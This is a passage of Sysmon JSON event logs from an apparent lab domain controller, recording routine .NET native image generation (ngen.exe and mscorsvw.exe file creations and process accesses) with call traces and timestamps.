DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7852,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:09.965\r\nProcessGuid: {A837DB8D-04E9-5F25-0000-001074C21100}\r\nProcessId: 4980\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1374-0\\System.Web.DynamicData.dll\r\nCreationUtcTime: 2020-08-01 06:00:09.965","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:09.965","ProcessGuid":"{A837DB8D-04E9-5F25-0000-001074C21100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1374-0\\System.Web.DynamicData.dll","CreationUtcTime":"2020-08-01 06:00:09.965","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7853,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.012\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001083C71100}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.012","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001083C71100}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7854,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.012\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001083C71100}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.012","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001083C71100}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7855,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.028\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001083C71100}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.028","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001083C71100}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7856,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.075\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010728E1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.075","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010728E1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7857,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.075\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010728E1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.075","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010728E1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7858,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010728E1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010728E1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7859,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:10.153\r\nProcessGuid: {A837DB8D-04EA-5F25-0000-0010A5CB1100}\r\nProcessId: 4372\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1114-0\\System.Web.DynamicData.Design.dll\r\nCreationUtcTime: 2020-08-01 06:00:10.153","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:10.153","ProcessGuid":"{A837DB8D-04EA-5F25-0000-0010A5CB1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1114-0\\System.Web.DynamicData.Design.dll","CreationUtcTime":"2020-08-01 06:00:10.153","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7860,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.184\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00102CD01100}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.184","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00102CD01100}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsof